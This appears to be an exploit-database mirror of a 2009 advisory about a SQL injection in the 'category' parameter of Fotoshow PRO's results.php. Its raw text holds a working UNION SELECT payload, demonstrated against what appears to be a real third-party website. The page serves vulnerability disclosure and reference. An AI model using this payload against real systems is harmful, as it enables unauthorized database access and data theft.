header-logo
Suggest Exploit
vendor:
Fotoshow PRO™
by:
darkmasking
N/A
CVSS
N/A
Remote SQL Injection
CWE
Product Name: Fotoshow PRO™
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

Fotoshow PRO™ (category) Remote SQL Injection Vulnerability

This vulnerability allows an attacker to inject SQL queries into the application's database, potentially gaining unauthorized access or modifying data.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users should avoid using the affected software or ensure it is only accessible from trusted networks.
Source

Exploit-DB raw data:

[»]====================================================================================================================[_][-][X]
[»]                                                                             					     [»]
[»]      	                   Fotoshow PRO™ (category) Remote SQL Injection Vulnerability  		             [»]
[»]              				         							             [»]
[»]            		 	        =======    ------d-------m------     ====    ====   			             [»]
[»]             	 	        ||     =        | |(o o)| |          ||   ||   ||   			             [»]
[»]             		        ||     =          ||(~)||            ||        ||   			             [»]
[»]             	 	        =======             /|\              ||        ||  			             [»]
[»]==========================================================================================================================[»]
[»] 				          Author         : darkmasking		 				             [»]
[»] 				          Date           : August, 15th 2009           				             [»]
[»]           		 	          Contact        : darkmasking[at]gmail[dot]com  			             [»]
[»]				          Critical Level : Dangerous (*RED)		  			             [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description :        					             				     [»]
[»] Software : Fotoshow PRO™							            				     [»]
[»] Vendor   : http://www.fotoshowpro.com/					            				     [»]
[»] Price    : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/	             				     [»]
[»]==========================================================================================================================[»]
[»]														             [»]
[»] [~] SQLi POC												             [»]
[»] 														             [»]
[»] [+] http://www.target.com/[path]/results.php?category=[SQli]`						             [»]
[»]														             [»]
[»]														             [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»]														             [»]
[»] [~] SQLi POC Demo													     [»]
[»]															     [»]
[»] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null--  [»]
[»]														             [»]
[»]--------------------------------------------------------------------------------------------------------------------------[»]
[»]														             [»]
[»] [~] Greetz													             [»]
[»]														             [»]
[»]	Sorry bro belum dapat teman, jadi untuk diri sendiri aja! (SELAMAT MERAYAKAN 17an | Semoga Meriah)	             [»]
[»]														             [»]
[»]														             [»]
[»]==========================================================================================================================[»]

# milw0rm.com [2009-08-18]

Navigation

Suggest Exploit

Services By CQR